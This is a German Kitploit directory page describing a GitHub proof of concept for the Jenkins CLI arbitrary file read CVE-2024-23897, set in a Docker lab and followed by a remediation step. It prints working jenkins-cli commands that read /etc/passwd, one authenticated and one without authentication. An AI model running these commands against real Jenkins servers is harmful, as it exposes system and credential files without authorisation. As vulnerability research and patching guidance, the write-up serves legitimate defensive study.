Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
PoC-Fix-jenkins-rce_CVE-2024-23897 — In diesem Git-Repository findest du alle Informationen zu CVE-2024-23897. | Kitploit
Tools/GitHubGitHub/10t4/poc-fix-jenkins-rce_cve-2024-23897
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungLabs & Praxis
GitHub10t4/poc-fix-jenkins-rce_cve-2024-23897

PoC-Fix-jenkins-rce_CVE-2024-23897

In diesem Git-Repository findest du alle Informationen zu CVE-2024-23897.

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
42vor 2 JahrenNoch nicht geprüft

PoC-jenkins-rce_CVE-2024-23897.

In diesem Git finden Sie alle Informationen zu CVE-2024-23897.

Jenkins-Logo

Einleitung

Das Problem, dem die CVE-Kennung CVE-2024-23897 zugewiesen wurde, wurde als eine Schwachstelle zum beliebigen Lesen von Dateien über die integrierte Befehlszeilenschnittstelle beschrieben. Dieser Befehlsparser hat eine Funktion, die ein @-Zeichen gefolgt von einem Dateipfad in einem Argument durch den Inhalt der Datei ersetzt (expandAtFiles). Diese Funktion ist standardmäßig aktiviert und Jenkins 2.441 und früher, LTS 2.426.2 und früher deaktivieren sie nicht.

PoC

Für diesen PoC habe ich Jenkins 2.426.2 mit Docker installiert, um den Exploit der Sicherheitslücke zu testen

root@kitploit:~
docker run -p 8080:8080 -p 50000:50000 -v jenkins_home:/var/jenkins_home jenkins/jenkins:2.426.2

Nach der Erstellung eines Benutzers und eines Passworts lud ich den Jenkins CLI-Client (jenkins-cli.jar) auf meiner angreifenden Maschine herunter.

Bildschirm1

Dann schrieb ich den Befehl für den Exploit. In diesem Befehl benötigen wir die Anmeldedaten des Jenkins-Benutzers.

root@kitploit:~
java -jar jenkins-cli.jar -s http://192.168.1.45:8080/ -auth "user:aze+123" connect-node "@/etc/passwd"
Bildschirm2

Ein weiterer Befehl erlaubt es, die ersten Zeilen einer Datei ohne Authentifizierung anzuzeigen.

root@kitploit:~
java -jar jenkins-cli.jar -noCertificateCheck -s 'http://192.168.1.45:8080' help "@/etc/passwd"
Bildschirm3

Behebung der Sicherheitslücke

Um diese Sicherheitslücke zu beheben, müssen Sie zur Jenkins-Konfigurationsdatei namens config.xml navigieren (in meinem Fall befindet sie sich in meinem Docker-Container, also wechsle ich in den Shell-Modus in meinem Container)

Bildschirm4
und fügen Sie die Zeile hinzu:
root@kitploit:~
<expandAtFiles>false</expandAtFiles>

und starten Sie Jenkins neu:

root@kitploit:~
service jenkins restart
Tool herunterladen